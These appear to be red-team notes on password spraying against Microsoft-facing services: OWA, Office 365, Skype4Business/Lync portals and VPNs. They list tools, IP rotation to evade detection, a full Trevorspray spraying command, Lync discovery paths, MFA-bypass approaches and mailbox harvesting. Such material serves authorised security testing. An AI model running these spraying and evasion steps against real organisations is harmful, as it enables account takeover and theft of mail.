Toolkit

• Sprayingtoolkit/atomizer.py

Potential Targets

• Skype4Business

• OWA Portals

• VPN Portals

• Jboss/Jira/Zoho other work management portals.

• Employee portals

Username Generator

• Namemash

IP Rotation

• Burp Extension: IPRotate

  • BHIS Blog : Link

  • AWS Keys Setup : Link

  • Proxycannon

  • Amazon Lambda

Attacking OWA

• Metasploit: scanner/http/owa_login

  • Automatically detects valid users based on faster server response.

Attacking O365

• Trevorspray : Microsoft 365 password sprayer

 ./trevorspray.py -e emails.txt --passwords "Winter2021!"  --delay 15 --no-current-ip --ssh ubuntu@<IP> ubuntu2@<IP2> -k privkey.pem

Skype4Business [Lync Servers]

Skype4B provides a bridge from The Internet into a company’s internal network, allowing an attacker to interact with the internal Active Directory environment.

Lync servers can provide many goodies for an attacker. All the same treasures that can be had with Outlook Web Access (OWA) portals can be had with Lync servers. This includes: internal-domain name disclosure, user enumeration via the AD timing attack, and even password spraying.

Reference:

• MDSec: Link

• TrustedSec: Link

Tool

• LyncSniper : Github

Locating the Front-End Server

Microsoft’s recommended naming format for the autodiscover URL is:

• https://lyncdiscover.<domain>.com (external)

• https://lyncdiscoverinternal.<domain>.com (internal)

If the ‘lyncdiscover’ subdomain does not exist, all is not lost. The following subdomains will often point to the Front-End server and are worth investigating.

• dialin.contoso.com

• scheduler.contoso.com

• meet.contoso.com

If XML references the domain ‘online.lync.com’, then the Skype server in question is hosted by Microsoft and these attacks will not work.

Web Login Portals

Two login portals that are commonly enabled in Skype4B installations:

• Dial-in Conferencing :

  • lyncdiscover.domain.com\dialin

  • dialin.domain.com

• Web Scheduler:

  • lyncdiscover.domain.com\scheduler

  • scheduler.domain.com

• Other paths that will likely be protected with NTLM authentication include:

  /WebTicket/WebTicketService.svc /abs/ /GroupExpansion /CertProv /RgsClients /RequestHandlerExt /mcx

Bypass 2-FA

• MFASweep : Detect MFA for various Microsoft Servers

• Credsniper

• Re-using valid credentials on alternate services

• Mailsniper

Exchange Server

• If you get access to email, pull down the global address list.

• Perform password spray with this new list of targets.

• Using credsniper to grep for "Keywords" within mail.